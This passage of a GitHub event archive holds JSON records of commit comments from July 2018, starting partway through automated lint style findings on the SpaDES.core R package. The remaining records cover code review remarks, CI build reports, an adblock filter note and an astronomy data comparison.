\"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-18T20:09:30Z"}
{"id":"7985193967","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29755271,"position":null,"line":null,"path":null,"commit_id":"2ef9d301f0869b443122e2ba543af054c5b0e53c","created_at":"2018-07-18T20:09:50Z","updated_at":"2018-07-18T20:09:50Z","author_association":"MEMBER","body":"any `std::chrono` type is effectively a single primitive value wrapped in a template class that provides conversion (e.g. multiplication/division) as compile-time `constexpr` operators.\r\n\r\ntl;dr it's effectively a prettier `uint64`. it fits in a register. it's the same size as a pointer (<-> reference). there is no copy cost. you pass it by value."}},"created_at":"2018-07-18T20:09:50Z"}
{"id":"7985195239","type":"CommitCommentEvent","actor":{"login":"ginkgomzd"},"repo":{"name":"cividesk/com.cividesk.email.sparkpost"},"payload":{"comment":{"id":29755276,"position":null,"line":null,"path":null,"commit_id":"69a0bdb17bb520334da7f472a2d7670b44da8071","created_at":"2018-07-18T20:10:06Z","updated_at":"2018-07-18T20:10:06Z","author_association":"NONE","body":"This appears to be required as of civicrm 5.3.0.\r\n\r\nRecommending an official release of the extension."}},"created_at":"2018-07-18T20:10:06Z"}
{"id":"7985196175","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29755279,"position":37,"line":54,"path":"tests/TicTacToeTest.php","commit_id":"156303c7fb3883be9e961afcfe219fec7c4710b6","created_at":"2018-07-18T20:10:17Z","updated_at":"2018-07-18T20:10:17Z","author_association":"NONE","body":"It's not clear to me which moves in this game lead to player 0 to win. I don't see any moves being done by either player."}},"created_at":"2018-07-18T20:10:17Z"}
{"id":"7985201287","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"hoshsadiq/adblock-nocoin-list"},"payload":{"comment":{"id":29755284,"position":6,"line":260,"path":"nocoin.txt","commit_id":"d4d06d301eac48ab13bce744b59819b3907dd4ee","created_at":"2018-07-18T20:11:22Z","updated_at":"2018-07-18T20:11:22Z","author_association":"CONTRIBUTOR","body":"@hoshsadiq By adding the option `important` to this filter in the main list you have alowed mining via this url  for adblock or adblock plus users !!\r\n\r\n* ubo filters should be added to the included ubo filter list `nocoin-ublock.txt`"}},"created_at":"2018-07-18T20:11:22Z"}
{"id":"7985201416","type":"CommitCommentEvent","actor":{"login":"evq"},"repo":{"name":"brave-intl/bat-go"},"payload":{"comment":{"id":29755285,"position":25,"line":25,"path":"utils/passphrase/passphrase.go","commit_id":"ab0ec7f6a7092cbabbe19e8251c509c1e95281fe","created_at":"2018-07-18T20:11:23Z","updated_at":"2018-07-18T20:11:23Z","author_association":"CONTRIBUTOR","body":"Probably just more flexible e.g. if you want to only derive the second key?"}},"created_at":"2018-07-18T20:11:23Z"}
{"id":"7985203705","type":"CommitCommentEvent","actor":{"login":"TheFakeMateo"},"repo":{"name":"TheFakeMateo/RedPlusPlus"},"payload":{"comment":{"id":29755290,"position":null,"line":null,"path":null,"commit_id":"fd8fd9a82294d177afe20826befffd4090b89501","created_at":"2018-07-18T20:11:50Z","updated_at":"2018-07-18T20:11:50Z","author_association":"OWNER","body":"TODO: Make display cases blue, not purple. Make sofas purple, not green. Use FireRed bookshelves for consistency."}},"created_at":"2018-07-18T20:11:50Z"}
{"id":"7985206504","type":"CommitCommentEvent","actor":{"login":"gcttong"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29755294,"position":26,"line":21,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"f094037d9569b8290efc2136dc3d3bf58039c2e5","created_at":"2018-07-18T20:12:25Z","updated_at":"2018-07-18T20:12:25Z","author_association":"COLLABORATOR","body":"yes this has been addressed in commit f5f2dc200839600a44b55104e172dd5253d3fd45"}},"created_at":"2018-07-18T20:12:25Z"}
{"id":"7985208047","type":"CommitCommentEvent","actor":{"login":"ry"},"repo":{"name":"piscisaureus/deno"},"payload":{"comment":{"id":29755300,"position":1,"line":1,"path":"build_extra/rust/extract_rlibs_linker.c","commit_id":"d6ec07380220df5dec4eb22061596103df3550c1","created_at":"2018-07-18T20:12:45Z","updated_at":"2018-07-18T20:12:45Z","author_association":"NONE","body":"Please add a verbose comment as to the purpose of this. I foresee this being very confusing to some future reader."}},"created_at":"2018-07-18T20:12:45Z"}
{"id":"7985211170","type":"CommitCommentEvent","actor":{"login":"ry"},"repo":{"name":"piscisaureus/deno"},"payload":{"comment":{"id":29755307,"position":25,"line":25,"path":"build_extra/rust/extract_rlibs_linker.c","commit_id":"d6ec07380220df5dec4eb22061596103df3550c1","created_at":"2018-07-18T20:13:24Z","updated_at":"2018-07-18T20:13:24Z","author_association":"NONE","body":"Why not use C++ ? std::string does stuff like this."}},"created_at":"2018-07-18T20:13:24Z"}
{"id":"7985214096","type":"CommitCommentEvent","actor":{"login":"paulnicholsen27"},"repo":{"name":"paulnicholsen27/js-basics-variables-lab-immersive-alum"},"payload":{"comment":{"id":29755313,"position":null,"line":null,"path":null,"commit_id":"d7b603db877e15a8c098acf7e73bf7c3e6f43640","created_at":"2018-07-18T20:13:57Z","updated_at":"2018-07-18T20:13:57Z","author_association":"OWNER","body":"team: @sydneybarlow"}},"created_at":"2018-07-18T20:13:57Z"}
{"id":"7985214234","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29755315,"position":null,"line":null,"path":null,"commit_id":"3426530b1bd0ede56bccf22d0f9571e0c4762774","created_at":"2018-07-18T20:13:59Z","updated_at":"2018-07-18T20:13:59Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2982 of 2984 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 641\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-18T20:13:59Z"}
{"id":"7985219498","type":"CommitCommentEvent","actor":{"login":"ReyDonovan"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29755323,"position":null,"line":null,"path":null,"commit_id":"9e5a75398321e8d392e6a19f37a802f956acfcdc","created_at":"2018-07-18T20:15:07Z","updated_at":"2018-07-18T20:15:07Z","author_association":"NONE","body":"hey @Traesh (nice)"}},"created_at":"2018-07-18T20:15:07Z"}
{"id":"7985221422","type":"CommitCommentEvent","actor":{"login":"salotron"},"repo":{"name":"salotron/scenario_alt"},"payload":{"comment":{"id":29755327,"position":145,"line":11295,"path":"Scenario/Text/text_mi_7dl.rpy","commit_id":"7772c83ef792d73f2db3fb4a52104834a904d351","created_at":"2018-07-18T20:15:30Z","updated_at":"2018-07-18T20:15:30Z","author_association":"OWNER","body":"tiam"}},"created_at":"2018-07-18T20:15:30Z"}
{"id":"7985225239","type":"CommitCommentEvent","actor":{"login":"tlsa"},"repo":{"name":"perlpunk/libyaml"},"payload":{"comment":{"id":29755333,"position":4,"line":1329,"path":"src/parser.c","commit_id":"61c710cae6b0c32d18abf6ef5b568f6f8db1ee41","created_at":"2018-07-18T20:16:16Z","updated_at":"2018-07-18T20:16:16Z","author_association":"NONE","body":"Another option is to leave the yaml_free line as it is, but do this:\r\n\r\n```c\r\n     if (version_directive_ref) {\r\n         *version_directive_ref = version_directive;\r\n         version_directive = NULL; /* ADD THIS LINE */\r\n     }\r\n```\r\nNow the free will be safe, because freeing a NULL pointer is a no-op.  Also it documents that the ownership is yielded."}},"created_at":"2018-07-18T20:16:16Z"}
{"id":"7985225935","type":"CommitCommentEvent","actor":{"login":"salotron"},"repo":{"name":"salotron/scenario_alt"},"payload":{"comment":{"id":29755336,"position":76,"line":10259,"path":"Scenario/Text/text_mi_dj.rpy","commit_id":"7772c83ef792d73f2db3fb4a52104834a904d351","created_at":"2018-07-18T20:16:23Z","updated_at":"2018-07-18T20:16:23Z","author_association":"OWNER","body":"узором"}},"created_at":"2018-07-18T20:16:23Z"}
{"id":"7985226215","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/nhmla"},"payload":{"comment":{"id":29755337,"position":null,"line":null,"path":null,"commit_id":"5ba547d05b97e3c7cccc3f863ac8630cc579fa6f","created_at":"2018-07-18T20:16:26Z","updated_at":"2018-07-18T20:16:26Z","author_association":"MEMBER","body":"Created multidev environment [nhmla#ci-12](https://dashboard.pantheon.io/sites/5e274a0d-a22e-4c9c-95aa-12ce53d2efa6#ci-12).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-12-nhmla.pantheonsite.io/)"}},"created_at":"2018-07-18T20:16:26Z"}
{"id":"7985227748","type":"CommitCommentEvent","actor":{"login":"rajgthub"},"repo":{"name":"rajgthub/group_research_node_class-4"},"payload":{"comment":{"id":29755340,"position":null,"line":null,"path":null,"commit_id":"5a95361c1c47667a73e281b5f8f399e22c6c9b50","created_at":"2018-07-18T20:16:46Z","updated_at":"2018-07-18T20:16:46Z","author_association":"OWNER","body":"Great work! I will have a look and ask others to check before merging your changes with master."}},"created_at":"2018-07-18T20:16:46Z"}
{"id":"7985232259","type":"CommitCommentEvent","actor":{"login":"trippedoutfish"},"repo":{"name":"trippedoutfish/ItemSense"},"payload":{"comment":{"id":29755342,"position":null,"line":null,"path":null,"commit_id":"d7a46eb1d4adfa8be7f82100d68efa895b1041c8","created_at":"2018-07-18T20:17:41Z","updated_at":"2018-07-18T20:17:41Z","author_association":"OWNER","body":"It was very surprising to be honest. Truly classic :D\n\nOn Wed, Jul 18, 2018, 9:44 AM gurpy <notifications@github.com> wrote:\n\n> Holy shit it works\n>\n> Classic Dougles\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/trippedoutfish/ItemSense/commit/d7a46eb1d4adfa8be7f82100d68efa895b1041c8#commitcomment-29752918>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALlUcmlPXFTjSXiKNc1i3dR86NWIABNGks5uH2XPgaJpZM4VU8Us>\n> .\n>\n"}},"created_at":"2018-07-18T20:17:41Z"}
{"id":"7985235864","type":"CommitCommentEvent","actor":{"login":"JonasWeismueller"},"repo":{"name":"Azure/azure-sdk-for-python"},"payload":{"comment":{"id":29755346,"position":null,"line":null,"path":null,"commit_id":"0489ff9345f8d8f74cd15ec6406a66de6885aff4","created_at":"2018-07-18T20:18:23Z","updated_at":"2018-07-18T20:18:23Z","author_association":"NONE","body":"Argh, wrong post. wanted to post that on the issue we had with this bugfix ;)"}},"created_at":"2018-07-18T20:18:23Z"}
{"id":"7985237081","type":"CommitCommentEvent","actor":{"login":"nmiles2718"},"repo":{"name":"mdlpstsci/hstcal"},"payload":{"comment":{"id":29755352,"position":null,"line":null,"path":null,"commit_id":"ac01de955be7a54457dd0731e382b13e06b1c323","created_at":"2018-07-18T20:18:37Z","updated_at":"2018-07-18T20:18:37Z","author_association":"NONE","body":"@mdlpstsci I am working on this now and should have final approval sometime by the end of tomorrow. So far, everything I have checked indicates it is working as expected.\r\n\r\n I took some 2018 data of 47 Tuc and generate some FLT's using this branch from your repo, and the master branch from the master hstcal repo under master repo. For each extension I checked to see that `sum(ext1_old - ext1_new)=0`, i.e. the sum of pixel by pixel difference is 0, and this was the case for every file implying that the two products are identical. Also, I should note that the `gitinfo` was pulled _directly_ from the trailer files produced by `CALACS` so as to ensure each file was actually processed with different versions of `CALACS`\r\n\r\nSome example output for completeness:\r\n```console\r\nComparing ./new_version/jdfw01awq_2d_flt.fits and ./old_version/jdfw01awq_1d_flt.fits\r\n./new_version/jdfw01awq_2d_flt.fits processed using\r\n git tag: 1.3.0rc6-69-gac01de9\r\n git branch: hackday\r\n HEAD @: ac01de955be7a54457dd0731e382b13e06b1c323\r\n--------------------------------------------------\r\n./old_version/jdfw01awq_1d_flt.fits processed using\r\n git tag: 2.0.0\r\n git branch: HEAD\r\n HEAD @: ce7fe09f255b882f816cc3c39d0102f58689f76f\r\n--------------------------------------------------\r\nResults:\r\nsum(sci2_old - sci2_new)=0.0\r\nsum(err2_old - err2_new)=0.0\r\nsum(dq2_old - dq2_new)=0\r\nsum(sci1_old - sci1_new)=0.0\r\nsum(err1_old - err1_new)=0.0\r\nsum(dq1_old - dq1_new)=0\r\n\r\nComparing ./new_version/jdfw02mnq_2d_flt.fits and ./old_version/jdfw02mnq_1d_flt.fits\r\n./new_version/jdfw02mnq_2d_flt.fits processed using\r\n git tag: 1.3.0rc6-69-gac01de9\r\n git branch: hackday\r\n HEAD @: ac01de955be7a54457dd0731e382b13e06b1c323\r\n--------------------------------------------------\r\n./old_version/jdfw02mnq_1d_flt.fits processed using\r\n git tag: 2.0.0\r\n git branch: HEAD\r\n HEAD @: ce7fe09f255b882f816cc3c39d0102f58689f76f\r\n--------------------------------------------------\r\nResults:\r\nsum(sci2_old - sci2_new)=0.0\r\nsum(err2_old - err2_new)=0.0\r\nsum(dq2_old - dq2_new)=0\r\nsum(sci1_old - sci1_new)=0.0\r\nsum(err1_old - err1_new)=0.0\r\nsum(dq1_old - dq1_new)=0\r\n\r\nComparing ./new_version/jdfw01bqq_2d_flt.fits and ./old_version/jdfw01bqq_1d_flt.fits\r\nSubarray! Skipping second set of extensions\r\n./new_version/jdfw01bqq_2d_flt.fits processed using\r\n git tag: 1.3.0rc6-69-gac01de9\r\n git branch: hackday\r\n HEAD @: ac01de955be7a54457dd0731e382b13e06b1c323\r\n--------------------------------------------------\r\n./old_version/jdfw01bqq_1d_flt.fits processed using\r\n git tag: 2.0.0\r\n git branch: HEAD\r\n HEAD @: ce7fe09f255b882f816cc3c39d0102f58689f76f\r\n--------------------------------------------------\r\nResults:\r\nsum(sci2_old - sci2_new)=0.0\r\nsum(err2_old - err2_new)=0.0\r\nsum(dq2_old - dq2_new)=0\r\n\r\nComparing ./new_version/jdfw01bqq_2d_flt.fits and ./old_version/jdfw01bqq_1d_flt.fits\r\nSubarray! Skipping second set of extensions\r\n./new_version/jdfw01bqq_2d_flt.fits processed using\r\n git tag: 1.3.0rc6-69-gac01de9\r\n git branch: hackday\r\n HEAD @: ac01de955be7a54457dd0731e382b13e06b1c323\r\n--------------------------------------------------\r\n./old_version/jdfw01bqq_1d_flt.fits processed using\r\n git tag: 2.0.0\r\n git branch: HEAD\r\n HEAD @: ce7fe09f255b882f816cc3c39d0102f58689f76f\r\n--------------------------------------------------\r\nResults:\r\nsum(sci2_old - sci2_new)=0.0\r\nsum(err2_old - err2_new)=0.0\r\nsum(dq2_old - dq2_new)=0\r\nComparing ./new_version/jdfw01c0q_2d_flt.fits and ./old_version/jdfw01c0q_1d_flt.fits\r\n./new_version/jdfw01c0q_2d_flt.fits processed using\r\n git tag: 1.3.0rc6-69-gac01de9\r\n git branch: hackday\r\n HEAD @: ac01de955be7a54457dd0731e382b13e06b1c323\r\n--------------------------------------------------\r\n./old_version/jdfw01c0q_1d_flt.fits processed using\r\n git tag: 2.0.0\r\n git branch: HEAD\r\n HEAD @: ce7fe09f255b882f816cc3c39d0102f58689f76f\r\n--------------------------------------------------\r\nResults:\r\nsum(sci2_old - sci2_new)=0.0\r\nsum(err2_old - err2_new)=0.0\r\nsum(dq2_old - dq2_new)=0\r\nsum(sci1_old - sci1_new)=0.0\r\nsum(err1_old - err1_new)=0.0\r\nsum(dq1_old - dq1_new)=0\r\n\r\n```"}},"created_at":"2018-07-18T20:18:37Z"}
{"id":"7985245066","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29755364,"position":null,"line":null,"path":null,"commit_id":"3426530b1bd0ede56bccf22d0f9571e0c4762774","created_at":"2018-07-18T20:20:10Z","updated_at":"2018-07-18T20:20:10Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-18T20:20:10Z"}
{"id":"7985246649","type":"CommitCommentEvent","actor":{"login":"shiftrtech"},"repo":{"name":"shiftrtech/mailinblue"},"payload":{"comment":{"id":29755367,"position":null,"line":null,"path":null,"commit_id":"e9c7a697af26db4b4243f947bc202e988b10bf70","created_at":"2018-07-18T20:20:29Z","updated_at":"2018-07-18T20:20:29Z","author_association":"OWNER","body":"Created multidev environment [mailinblue#ci-16](https://dashboard.pantheon.io/sites/7c88439c-0f59-4679-be2f-1f02e1043d37#ci-16).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-16-mailinblue.pantheonsite.io/)"}},"created_at":"2018-07-18T20:20:29Z"}
